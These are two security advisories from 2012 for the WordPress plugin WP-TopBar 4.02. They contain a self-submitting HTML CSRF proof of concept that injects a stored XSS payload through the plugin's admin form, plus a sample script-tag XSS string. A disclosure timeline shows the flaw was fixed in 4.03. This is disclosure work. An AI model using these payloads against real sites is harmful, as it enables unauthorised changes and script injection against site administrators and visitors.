[php]# Exploit Title: WP-TopBar 4.02 CSRF # Date: 2012-09-13 # Author: Blake Entrekin # Version: 4.02 # Download Link: http://downloads.wordpress.org/plugin/wp-topbar.4.02.zip # Vendor Link: http://wordpress.org/extend/plugins/wp-topbar/ ------------------- CSRF ------------------- The wp-topbar.php does not utilize a nonce value when submitting any POST changes. As a result, this page is vulnerable to Cross Site Request Forgery. Proof of Concept Code: <html> <head> <title></title> </head> <body> <form name="testform" action=" https://localhost/wordpress/wp-admin/admin.php?page=wp-topbar.php&action=topbartext&barid=1" method="POST"> <br> <input type="hidden" name="wptbbartext" value="</script><script>onload=alert(3)</script>"> <input type="hidden" name="wptblinktext" value="whatever"> <input type="hidden" name="wptblinkurl" value="http%3A%2F%2Fwordpress.org%2Fextend%2Fplugins%2Fwp-topbar%2F"> <input type="hidden" name="wptblinktarget" value="blank"> <input type="hidden" name="wptbenableimage" value="false"> <input type="hidden" name="wptbbarimage" value=""> <input type="hidden" name="update_wptbSettings" value="Update+Settings"> </form> <script type="text/javascript"> document.testform.submit(); </script> </body> </html> This script takes advantage of a logged in user to submit the required variables needed to update an existing TopBar with the required settings that commits and executes a Stored XSS vulnerability from a previous disclosure. In this example it was tested against a wordpress application running on �localhost� and altered a TopBar with the �id� of 1. This version of WP-TopBar creates a default TopBar with the id of 1 upon installation. Any subsequent TopBar created has an id incremented. It can be assumed that a user is more then likely to still have the default TopBar and easily attack it. # Vulnerability Timeline 2012-09-04 � Vulnerability Reported 2012-09-05 � Developer Acknowledges 2012-09-10 � Developer Issues Fix (v4.03) 2012-09-15 - Vulnerability Disclosed -- Blake Entrekin Independent Security Consultant/ Web Penetration Tester http://EntreSec.blogspot.com Twitter: @entresec <https://twitter.com/#%21/entresec> # Exploit Title: WP-TopBar 4.02 Authenticated Stored XSS # Date: 2012-09-13 # Author: Blake Entrekin # Version: 4.02 # Download Link: http://downloads.wordpress.org/plugin/wp-topbar.4.02.zip # Vendor Link: http://wordpress.org/extend/plugins/wp-topbar/ ------------------- Stored XSS ------------------- The message field (wptbbartext variable) of the wp-topbar.php page is vulnerable to Stored Cross-site Scripting. This variable is only accessible via the admin menu of the plugin. The following code is an example: </script><script>alert(3)</script> This code is committed to the database upon submission and will run both under the admin interface when the bar is shown as a preview as well as the front facing page where the bar is set to display. # Vulnerability Timeline 2012-09-04 � Vulnerability Reported 2012-09-05 � Developer Acknowledges 2012-09-10 � Developer Issues Fix (v4.03) 2012-09-15 - Vulnerability Disclosed -- Blake Entrekin Independent Security Consultant/ Web Penetration Tester http://EntreSec.blogspot.com Twitter: @entresec <https://twitter.com/#%21/entresec>[/php]